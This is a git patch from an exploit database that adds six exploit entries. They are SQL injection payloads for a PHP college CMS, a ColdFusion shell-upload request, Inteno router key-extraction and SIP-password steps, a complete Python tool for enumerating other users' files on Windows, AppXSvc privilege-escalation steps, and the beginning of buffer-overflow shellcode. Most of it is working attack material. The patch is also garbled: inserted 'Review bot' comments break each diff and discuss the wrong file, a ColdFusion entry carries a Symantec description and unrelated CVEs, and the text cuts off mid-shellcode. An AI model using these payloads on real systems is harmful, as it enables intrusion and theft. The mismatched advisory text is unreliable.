From b6378fddcc1cb3f25c73ff1cf837a093f7d484f1 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 17 Sep 2019 05:02:21 +0000
Subject: [PATCH] DB: 2019-09-17 6 changes to exploits/shellcodes Windows NTFS - Privileged File Access Enumeration AppXSvc - Privilege Escalation docPrint Pro 8.0 - SEH Buffer Overflow Inteno IOPSYS Gateway - Improper Access Restrictions Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection
---
exploits/cfm/webapps/47392.txt | 64 ++++
exploits/hardware/remote/47390.txt | 96 ++++++
exploits/php/webapps/47395.txt | 27 ++
exploits/windows/local/47357.py | 458 +++++++++++++++++++++++++++++
exploits/windows/local/47389.txt | 53 ++++
exploits/windows/local/47394.py | 114 +++++++
files_exploits.csv | 6 +
7 files changed, 818 insertions(+)
create mode 100644 exploits/cfm/webapps/47392.txt
create mode 100644 exploits/hardware/remote/47390.txt
create mode 100644 exploits/php/webapps/47395.txt
create mode 100755 exploits/windows/local/47357.py
create mode 100644 exploits/windows/local/47389.txt
create mode 100755 exploits/windows/local/47394.py
diff --git a/exploits/cfm/webapps/47392.txt b/exploits/cfm/webapps/47392.txt
new file mode 100644
index 000000000..a09685700
--- /dev/null
+++ b/exploits/cfm/webapps/47392.txt
@@ -0,0 +1,64 @@
+===========Security Intelligence============
+# Vendor Homepage: adobe.com
+# Version: 2018
+# Tested on: Adobe ColdFusion 2018
+# Exploit Author: Pankaj Kumar Thakur (Nepal)
+
+==========[Table of Contents]==============
+ * Overview
+ * Detailed description
+ * Thanks & Acknowledgements
+ * References
+
+==========[Vulnerability Information]========
+
+ * Unrestricted file upload in Adobe ColdFusion 2018
+ * CWE-434
+ * Base Score: 6.8 MEDIUM
+ * Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
+
+=========[ Overview]=========================
+
+ * System Affected: Adobe ColdFusion 2018
+ * Impact: Unrestricted file upload
+
+=====[ Detailed description]=================
+Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code.
+
+Request
+
+POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
+HTTP/1.1
+Host: hostname:portno
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Content-Type: multipart/form-data;
+Content-Length: 303
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+.
+.
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="file"; filename="shell_file with extension"
+Content-Type: image/jpeg
+
+shell code
+-----------------------------24464570528145
+Content-Disposition: form-data; name="path"
+.
+.
+After uploading shell, its located here
+
+http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension
+
+=====[ Thanks & Acknowledgements]========================================
+* Acknowledged by Adobe
+* Duplicate
+
+
+ * https://nvd.nist.gov/vuln/detail/CVE-2016-10258
+ * https://www.cvedetails.com/cve/CVE-2016-1713/
+ * https://www.openwall.com/lists/oss-security/2016/01/12/4
+
+=====[ EOF ]===========================================================
\ No newline at end of file
diff --git a/exploits/hardware/remote/47390.txt b/exploits/hardware/remote/47390.txt
new file mode 100644
index 000000000..fdb5cbdbf
--- /dev/null
+++ b/exploits/hardware/remote/47390.txt
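Review bot: The header, the request and the file path all describe Adobe ColdFusion 2018 (`upload.cfm` under `/cf_scripts/`), but the 'Detailed description' paragraph is about the Symantec ASG/ProxySG management console and the References point at CVE-2016-10258, CVE-2016-1713 and a 2016 oss-security thread, none of which the ColdFusion text supports; the commit subject's 'Symantec Advanced Secure Gateway (ASG) / ProxySG' line appears to be this same entry. Anyone triaging from this file cannot tell which product or CVE is affected, so the description should be rewritten for the ColdFusion CKEditor filemanager upload and the References replaced with the Adobe bulletin that the 'Acknowledged by Adobe / Duplicate' lines refer to (use `<Adobe advisory id>` as a placeholder until confirmed). It is also worth stating plainly that the CVSS vector's `PR:H` means an already-privileged account is required, which bounds the risk for defenders.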
@@ -0,0 +1,96 @@
+# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions
+# Date: 2019-06-29
+# Exploit Author: Gerard Fuguet (gerard@fuguet.cat)
+# Vendor Homepage: https://www.intenogroup.com/
+# Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650
+# Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937
+# Affected Component: SIP password, Info Gathering of Network Config
+# Attack Type: Remote
+# Tested on: Kali Linux 2019.2 against an Inteno EG200 Router
+# CVE : CVE-2019-13140
+
+# Description:
+Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before
+firmwares routers have a JUCI ACL misconfiguration that allows
+the "user" account to extract the 3DES key via JSON commands to ubus.
+The 3DES key is used to decrypt the provisioning file provided by
+Adamo Telecom on a public URL via cleartext HTTP.
+
+# Attack Vectors:
+To get success on the exploitation, two components are mandatory: 1.
+the encrypted file (.enc) and 2. The 3DES key for decrypt it. The
+encrypted file can be downloaded via HTTP URL offered by Adamo ISP
+(works from any external network). Then is need to interact with the
+router using WebSocket protocol to obtain the 3DES key, a web browser
+like Firefox can be used as WebSocket client under the developer
+tools. Session id is acquired with the same username and password of
+the router (in this case, password is the same as wifi defaults). Once
+3DES key is obtained through a JSON request command, .enc file can be
+decrypted with the help of openssl tool.
+
+# PoC:
+Step 1: Getting the provisioning file
+Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc
+Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without
+the colons. You can also get your MAC by doing a ping to the router
+and then an arp command on terminal.
+Step 2: The 3DES Key
+Let's communcatie by Sockets
+- Using Firefox, open the router’s webpage (192.168.1.1 by default).
+- Invoke the developer tools by pressing F12 and go to the Console Tab.
+- Let’s create the WebSocket:
+var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json")
+- And creating the Log for show responses in each petition:
+superSocket.onmessage = function (event) {console.log(event.data)}
+- We request an ID session with the same login parameters that when access
+to the router’s website. (put your wifis router password instead of
+wifis-password value):
+superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666}))
+- Now, you will obtain a response, the value of the parameter that says
+“ubus_rpc_session” refers to your session’s ID, copy it to use in the next
+request call.
+- Requesting information about the router’s System. (put your session ID
+instead of put-your-session-id-here value):
+superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999}))
+- On the response obtained, copy the value of the “des” parameter.
+It’s 16 digits that we need convert to hexadecimal.
+Step 3: Ready for Decrypting
+Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key:
+echo -n XXXXXXXXXXXXXXXX | xxd -p
+- Use openssl tool to decrypt your provisioning file. (Put your "des" key
+instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX
+refers the name of your encryption provisioning file, in the -out
+value, the name can be different):
+openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz
+- Uncompress the decrypted file:
+tar -xzvf XXXXXXXXXXXX.tar.gz
+- You get the file: Provisioning.conf.
+- Showing the file:
+cat Provisioning.conf
+- The end of the line refers to the secret, the password of your
+SIP account.
+A video was created to show all these Steps in action:
+https://youtu.be/uObz1uE5P4s
+
+# Additional Information:
+A packet sniffer like Wireshark can be used for retrieve the 3DES key
+instead of using WebSocket communication protocol. In that case, user
+needs to do the login on the router's page, and then the JSON request
+containing the 3DES key will be catched.
+
+# References:
+https://twitter.com/GerardFuguet/status/1169298861782896642
+https://www.slideshare.net/fuguet/call-your-key-to-phone-all
+
+# Timeline:
+2019-06-29 - White Paper done
+2019-07-01 - CVE assigned
+2019-07-09 - Notified to Inteno
+2019-07-11 - Adamo aware and ask for detailed info
+2019-07-12 - Info facilitated
+2019-07-25 - Early patch available and applied (Cooperation starts)
+2019-07-26 - Tested and failed (VoIP not working)
+2019-08-27 - New firmware available
+2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router
+2019-08-31 - Tested OK
+2019-09-04 - Disclosure published
\ No newline at end of file
diff --git a/exploits/php/webapps/47395.txt b/exploits/php/webapps/47395.txt
new file mode 100644
index 000000000..67df0cf23
--- /dev/null
+++ b/exploits/php/webapps/47395.txt
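Review bot: The remediation is only half-described: the `# Fixed Version:` header names the firmware that closes the ubus ACL issue, yet the 'Attack Vectors' section says two components are mandatory and the first one — the per-MAC provisioning file fetched over cleartext HTTP from a public URL — is never mentioned again, so a reader cannot tell whether the updated firmware alone removes the exposure. A line in the Timeline or Additional Information such as `Provisioning endpoint status after fix: <still public / TLS / authenticated>` would let operators judge residual risk, and since the PoC uses a `ws://` socket and the Additional Information note says a packet sniffer sees the key, the advisory should also say plainly that the management channel itself is unencrypted. Minor wording: `communcatie` → `communicate`, `will be catched` → `will be captured`.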
@@ -0,0 +1,27 @@
+# Exploit Title: CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection
+# Author: Cakes
+# Discovery Date: 2019-09-16
+# Vendor Homepage: https://github.com/SaloniKumari123/CollegeManagementSystem
+# Software Link: https://github.com/SaloniKumari123/CollegeManagementSystem/archive/master.zip
+# Tested Version: 1.3
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Description:
+# Another College Management system coded in PHP, most input values accounted for and sanitized, except this one :-)
+
+# Parameter: batch (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause
+
+Payload: batch=-9643' OR 9247=9247-- aqgq
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: batch=2021' AND (SELECT 6451 FROM (SELECT(SLEEP(5)))CWMt)-- zEfe
+
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 3 columns
+
+Payload: batch=2021' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x564f6e51546c6f634741454d714e5777716d427361504d7a794b686c50657472724d616f49674b51,0x7171627171),NULL-- pPUb
\ No newline at end of file
diff --git a/exploits/windows/local/47357.py b/exploits/windows/local/47357.py
new file mode 100755
index 000000000..445aaa345
--- /dev/null
+++ b/exploits/windows/local/47357.py
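Review bot: The advisory names the injectable parameter (`batch`, GET) and three payload classes but never the script that reads it, so a maintainer cannot locate the unparameterised query in the linked repository and a defender cannot write a precise WAF or log rule for it. Add a header line such as `# Vulnerable File: <path of the PHP script that reads $_GET['batch']>` and a one-line fix note (bind `batch` in a prepared statement) so the entry is actionable beyond the payloads. The header also records only a discovery date and `CVE: N/A`; stating whether the upstream project was notified would complete the disclosure record.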
@@ -0,0 +1,458 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows NTFS
+
+NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family.
+
+
+[Vulnerability Type]
+Privileged File Access Enumeration
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name.
+This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension
+or have a "." (dot) as part of the file or folder name.
+
+Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames
+of other users, maybe we need to locate files up front that we wish to steal possibly prior to launching say an XXE exploit to steal
+those files or maybe we just passively sniff the accounts directories to profile the mark and or learn their daily activities.
+
+Standard account users attempting to open another users files or folders that do not contain a valid extension or dot "." in its filename
+are always issued the expected "Access is denied" system error message.
+
+However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker friendly warning:
+"The system cannot find the file".
+
+This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file".
+
+Example, the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not.
+This helps protect users from having their local files known to attackers, since the system returns the same message regardless if files
+exist or not when using those commands. Those commands output messages are not affected by the file having a valid extension or not.
+
+However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible
+users file on the command line much like calling a program and pressing the enter key.
+
+After the Win32 API function CreateFile is called an it returns either:
+
+1) "The system cannot find the file"
+2) "Access is denied"
+
+C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact
+The system cannot find the file <==== DOES NOT EXIST
+
+C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact
+Access is denied. <===== EXISTS
+
+C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con
+The system cannot find the file <==== DOES NOT EXIST
+
+C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever
+Access is denied. <===== FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME
+
+From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe
+or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass.
+
+Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide
+processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is
+how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the
+malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights.
+
+Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd.
+However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages.
+
+Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing
+files or folders in the local file system.
+
+
+Tested successfully Win7/10
+
+
+[Exploit/POC]
+"NtFileSins.py"
+
+from subprocess import Popen, PIPE
+import sys,argparse,re
+
+# NtFileSins v2.1
+# Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet.
+# Fixed: save() logic to log report in case no Zone.Identifiers found.
+#
+# Windows File Enumeration Intel Gathering.
+# Standard users can prove existence of privileged user artifacts.
+#
+# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
+# when a file exists or doesn't exist, when restricted access is attempted by another user.
+#
+# However, accessing files directly by attempting to "open" them from cmd.exe shell,
+# we can determine existence by compare inconsistent Windows error messages.
+#
+# Requirements: 1) target users with >= privileges (not admin to admin).
+# 2) artifacts must contain a dot "." or returns false positives.
+#
+# Windows message "Access Denied" = Exists
+# Windows message "The system cannot find the file" = Not exists
+# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
+# operable program or batch file" = Admin to Admin so this script is not required.
+#
+# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
+# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
+#
+#======================================================================#
+# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1 #
+# By John Page (aka hyp3rlinx) #
+# Apparition Security #
+#======================================================================#
+
+BANNER='''
+ _ _______________ __ _____ _
+ / | / /_ __/ ____(_) /__ / ___/(_)___ _____
+ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/
+ / /| / / / / __/ / / / __/__/ / / / / (__ )
+/_/ |_/ /_/ /_/ /_/_/\___/____/_/_/ /_/____/ v2.1
+ By hyp3rlinx
+ ApparitionSec
+'''
+
+sin_cnt=0
+internet_sin_cnt=0
+found_set=set()
+zone_set=set()
+ARTIFACTS_SET=set()
+ROOTDIR = "c:/Users/"
+ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
+
+USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
+ "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]
+
+APPDATA_DIR=["AppData/Local/Temp"]
+
+EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat",
+ ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])
+
+REPORT="NtFileSins_Log.txt"
+
+def usage():
+ print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
+ print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
+ print '-u victim -a ""'
+ print "-u victim -d Downloads -a -s"
+ print '-u victim -d Contacts -a "Mike N.contact"'
+ print "-u victim -a APT.txt -b -n"
+ print "-u victim -d -z Desktop/MyFiles -a <.name>"
+ print "-u victim -d Searches -a .search-ms"
+ print "-u victim -d . 
-a " + print "-u victim -d desktop -a inverted-crosses.mp3 -b" + print "-u victim -d Downloads -a APT.exe -b" + print "-u victim -f list_of_files.txt" + print "-u victim -f list_of_files.txt -b -s" + print "-u victim -f list_of_files.txt -x .txt" + print "-u victim -d desktop -f list_of_files.txt -b" + print "-u victim -d desktop -f list_of_files.txt -x .rar" + print "-u victim -z -s -f list_of_files.txt" + +def parse_args(): + parser.add_argument("-u", "--user", help="Privileged user target") + parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .") + parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.") + parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.") + parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.") + parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.") + parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.") + parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. 
<.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.") + parser.add_argument("-z", "--zone_identifier", nargs="?", const="1", help="Identifies artifacts downloaded from the internet by checking for Zone.Identifier:$DATA.") + parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT) + parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.") + parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.") + return parser.parse_args() + + +def access(j): + result="" + try: + p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True) + stderr,stdout = p.communicate() + result = stdout.strip() + except Exception as e: + #print str(e) + pass + return result + + +def artifacts_from_file(artifacts_file, bflag, specific_ext): + try: + f=open(artifacts_file, "r") + for a in f: + idx = a.rfind(".") + a = a.strip() + if a != "": + if specific_ext: + if idx==-1: + a = a + specific_ext + else: + #replace existing ext + a = a[:idx] + specific_ext + if bflag: + ARTIFACTS_SET.add(a) + else: + ARTIFACTS_SET.add(a) + f.close() + except Exception as e: + print str(e) + exit() + + +def save(): + try: + f=open(REPORT, "w") + for j in found_set: + f.write(j+"\n") + f.close() + except Exception as e: + print str(e) + + +def recon_msg(s): + if s == 0: + return "Access is denied." + else: + return "\t[*] Artifact exists ==>" + + +def echo_results(args, res, x, i): + global sin_cnt + if res=="": + print "\t[!] No NTFS message, you must already be admin, then this script is not required." + exit() + if "not recognized as an internal or external command" in res: + print "\t[!] You must target users with higher privileges than yours." 
+ exit() + if res != recon_msg(0): + if args.verbose: + print "\t"+res + else: + if args.notfound: + print "\t[-] not found: " + x +"/"+ i + else: + sin_cnt += 1 + if args.save or args.zone_identifier: + found_set.add(x+"/"+i) + if args.verbose: + print recon_msg(1)+ x+"/"+i + print "\t"+res + else: + print recon_msg(1)+ x+"/"+i + + +def valid_artifact_name(sin,args): + idx = "." in sin + if re.findall(r"[/\\*?:<>|]", sin): + print "\t[!] Skipping: disallowed file name character." + return False + if not idx and not args.built_in_ext and not args.specific_ext: + print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives." + print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives." + if not args.built_in_ext: + if sin[-1] == ".": + print "\t[!] Skipping: "+sin+" non valid file name." + return False + return True + + +def search_missing_ext(path,args,i): + for x in path: + for e in EXTS: + res = access(ROOTDIR+args.user+"/"+x+"/"+i+e) + echo_results(args, res, x, i+e) + + +#Check if the found artifact was downloaded from internet +def zone_identifier_check(args): + + global ROOTDIR, internet_sin_cnt + zone_set.update(found_set) + + for c in found_set: + c = c + ZONE_IDENTIFIER + res = access(ROOTDIR+args.user+"/"+c) + if res == "Access is denied.": + internet_sin_cnt += 1 + print "\t[$] Zone Identifier found: "+c+" this file was downloaded over the internet!." + zone_set.add(c) + + +def ntsins(path,args,i): + if i.rfind(".")==-1: + search_missing_ext(path,args,i) + i="" + for x in path: + if i != "": + if args.built_in_ext: + for e in EXTS: + res = access(ROOTDIR+args.user+"/"+x+"/"+i+e) + echo_results(args, res, x, i+e) + elif args.specific_ext: + idx = i.rfind(".") + if idx == -1: + i = i + "." 
+ else: + i = i[:idx] + args.specific_ext + res = access(ROOTDIR+args.user+"/"+x+"/"+i) + echo_results(args, res, x, i) + + +def search(args): + print "\tSearching...\n" + global ROOTDIR, USER_DIRS, ARTIFACTS_SET + + if args.artifact: + ARTIFACTS_SET = set([args.artifact]) + + for i in ARTIFACTS_SET: + idx = i.rfind(".") + 1 + if idx and args.built_in_ext: + i = i[:idx -1:None] + if len(i) > 0 and i != None: + if valid_artifact_name(i,args): + #specific user dir search + if args.directory: + single_dir=[args.directory] + ntsins(single_dir,args,i) + #search appdata dirs + elif args.appdata: + ntsins(APPDATA_DIR,args,i) + #all default user dirs + else: + ntsins(USER_DIRS,args,i) + + +def check_dir_input(_dir): + if len(re.findall(r":", _dir)) != 0: + print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h." + return False + return True + + +def main(args): + + if len(sys.argv)==1: + parser.print_help(sys.stderr) + sys.exit(1) + + if args.examples: + usage() + exit() + + if not args.user: + print "[!] No target user specified see Help -h" + exit() + + if args.appdata and args.directory: + print "[!] Multiple search directories supplied see Help -h" + exit() + + if args.specific_ext: + if "." not in args.specific_ext: + print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives." + exit() + + if args.artifact and args.artifacts_from_file: + print "[!] Multiple artifacts specified, use just -f or -a see Help -h" + exit() + + if args.built_in_ext and args.specific_ext: + print "\t[!] Both specific and built-in extensions supplied, use only one." + exit() + + if args.specific_ext and not args.artifacts_from_file: + print "\t[!] -x to be used with -f flag only see Help -h." + exit() + + if args.artifact: + if args.artifact.rfind(".")==-1: + print "\t[!] Artifacts must contain a .ext or will result in false positives." 
+ exit() + + if args.directory: + if not check_dir_input(args.directory): + exit() + + if args.artifacts_from_file: + artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext) + + if not args.artifact and not args.artifacts_from_file: + print "[!] Exiting, no artifacts supplied see Help -h" + exit() + else: + search(args) + + if sin_cnt >= 1 and args.zone_identifier: + zone_identifier_check(args) + + if args.save and len(found_set) != 0 and not args.zone_identifier: + save() + + if args.save and len(zone_set) != 0: + found_set.update(zone_set) + save() + + print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n" + + if args.zone_identifier and internet_sin_cnt >= 1: + print "\t"+str(internet_sin_cnt) + " of the sins were internet downloaded.\n" + + if not args.notfound: + print "\tuse -n to display unfound enumerated files." + if not args.built_in_ext: + print "\tfor extra search coverage try -b flag or targeted artifact search -a." + +if __name__ == "__main__": + print BANNER + parser = argparse.ArgumentParser() + main(parse_args()) + + + +[POC Video URL] +https://www.youtube.com/watch?v=rm8kEbewqpI + + + +[Network Access] +Remote/Local + + + +[Severity] +Low + + +[Disclosure Timeline] +Vendor Notification: July 29, 2019 +MSRC "does not meet the bar for security servicing" : July 29, 2019 +September 5, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47389.txt b/exploits/windows/local/47389.txt
new file mode 100644
index 000000000..2ff08627a
--- /dev/null
+++ b/exploits/windows/local/47389.txt
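Review bot: The file is committed with mode 100755 and a `.py` extension, yet everything from `[+] Credits:` down to `"NtFileSins.py"` and the trailer after the `if __name__ == "__main__":` block is advisory prose, so the interpreter fails on the very first line; either store the script alone and the advisory in a sibling `.txt`, or wrap the prose in a module docstring. Inside `access()`, `stderr,stdout = p.communicate()` has the names reversed — `communicate()` returns `(stdout, stderr)` — so the value later compared against `"Access is denied."` is really the stderr pipe; it presumably works only because cmd.exe reports these errors on stderr, so the lines should read `stdout, stderr = p.communicate()` and `result = stderr.strip()` so that what is matched is stated honestly. The same function's `except Exception: pass` returns `""`, which `echo_results()` then reports as "you must already be admin"; printing the exception instead would keep that diagnostic truthful. The code is Python 2 (`print` statements) with no shebang or version note, which the header comment should state.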
@@ -0,0 +1,53 @@
+#-----------------------------------------------------------------------------#
+# Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite (EoP) #
+# Date: Sep 4 2019 #
+# Exploit Author: Gabor Seljan #
+# Vendor Homepage: https://www.microsoft.com/ #
+# Version: 17763.1.amd64fre.rs5_release.180914-1434 #
+# Tested on: Windows 10 Version 1809 for x64-based Systems #
+# CVE: CVE-2019-1253 #
+#-----------------------------------------------------------------------------#
+
+Summary:
+
+AppXSvc improperly handles file hard links resulting in a low privileged user
+being able to take 'Full Control' of an arbitrary file leading to elevation of
+privilege.
+
+Description:
+
+An elevation of privilege vulnerability exists when the AppX Deployment Server
+(AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
+originally reported by Nabeel Ahmed, I have found that AppXSvc sometimes opens
+the settings.dat[.LOGx] files of Microsoft Edge for a restore operation that
+modifies the security descriptor of the files. Further analyzis revealed that
+the restore operation can be triggered on demand by preventing AppXSvc from
+accessing the settings.dat[.LOGx] files. This can be achieved by locking the
+settings.dat[.LOGx] file, resulting in 'Access Denied' and 'Sharing Violation'
+errors when Edge and AppXSvc are trying to access it. Eventually the restore
+operation kicks in and if the settings.dat[.LOGx] file has been replaced with
+a hard link AppXSvc will overwrite the security descriptor of the target file.
+A low privileged user can leverage this vulnerability to take 'Full Control'
+of an arbitrary file.
+
+Steps to reproduce:
+1. Terminate Edge.
+2. Create a hard link from settings.dat.LOG2 to C:\Windows\win.ini.
+3. Open the hard link for reading and lock the file.
+4. Start Edge and wait a few seconds for the restore operation to kick in.
+5. Unlock the file and close the file handle.
+
+Expected result:
+Full access (GENERIC_ALL) to C:\Windows\win.ini is denied.
+
+Observed result:
+C:\Windows\win.ini has had it's security descriptor rewritten to grant
+'Full Control' to the low privileged user.
+
+PoC files:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47389.zip
+
+References:
+https://github.com/sgabe/CVE-2019-1253
+https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1253
+https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
\ No newline at end of file
diff --git a/exploits/windows/local/47394.py b/exploits/windows/local/47394.py
new file mode 100755
index 000000000..764409837
--- /dev/null
+++ b/exploits/windows/local/47394.py
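Review bot: The header records the vulnerable build (`17763.1.amd64fre.rs5_release.180914-1434`) and the CVE but not the fixed build or update, so a reader cannot tell whether a Windows 10 1809 system with later cumulative updates is still exposed; a line such as `# Fixed in: <KB / build from the MSRC advisory>` next to the CVE reference would close that gap. The 'Observed result' also gives defenders a concrete detection hook — an unexpected security-descriptor change on a system file performed by AppXSvc — that the advisory could state in one sentence. Minor wording: `analyzis` → `analysis`, `has had it's security descriptor` → `has had its security descriptor`.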
@@ -0,0 +1,114 @@ +import struct +# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow +# Date: September 14th, 2019 +# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io) +# Vendor Homepage: http://www.verypdf.com +# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe +# Version: 8.0 +# Tested on: Windows 10 and Windows 7 + + +# TO RUN: +# 1. Create a blank file named "test.pdf" +# 2. Open doc2pdf_win.exe +# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File" +# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay" +# 5. Click "Add File(s)" +# 6. Select the "test.pdf" file created from step 1. +# 7. Press on "Start" and name the file "exploit.pdf" + +# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII) + +# Zero out registers for calculations. +zero = "\x25\x01\x01\x01\x01" +zero += "\x25\x10\x10\x10\x10" + +# Stack alignment +alignment = "\x54" # push esp +alignment += "\x58" # pop eax +alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555 +alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 +alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 +alignment += "\x50" # push eax +alignment += "\x5c" # pop esp + +# Custom created and encoded MessageBox POC shellcode. +# Utilized aplication DLL with no 